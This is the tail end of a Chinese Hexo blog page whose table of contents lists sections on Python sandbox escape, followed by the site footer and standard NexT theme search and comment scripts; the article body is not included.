              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#基础知识"><span class="nav-number">1.</span> <span class="nav-text">基础知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#内建名称空间-builtins"><span class="nav-number">1.1.</span> <span class="nav-text">内建名称空间 __builtins__</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#python中的类继承以及全局变量方法"><span class="nav-number">1.2.</span> <span class="nav-text">python中的类继承以及全局变量方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#从沙盒编写中看沙盒逃逸思路"><span class="nav-number">2.</span> <span class="nav-text">从沙盒编写中看沙盒逃逸思路</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#通过删除内建空间中的成员来限制"><span class="nav-number">2.1.</span> <span class="nav-text">通过删除内建空间中的成员来限制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#通过对参数的匹配来进行过滤"><span class="nav-number">2.2.</span> <span class="nav-text">通过对参数的匹配来进行过滤</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Android中类似的绕过方式"><span class="nav-number">3.</span> <span class="nav-text">Android中类似的绕过方式</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yiruma</span>
  <span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
<span id="busuanzi_container_site_uv">
  本站访客数<span id="busuanzi_value_site_uv"></span>人次
</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (search_path.endsWith("json")) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=5.1.1"></script>



  

  

  

  

  

</body>
</html>
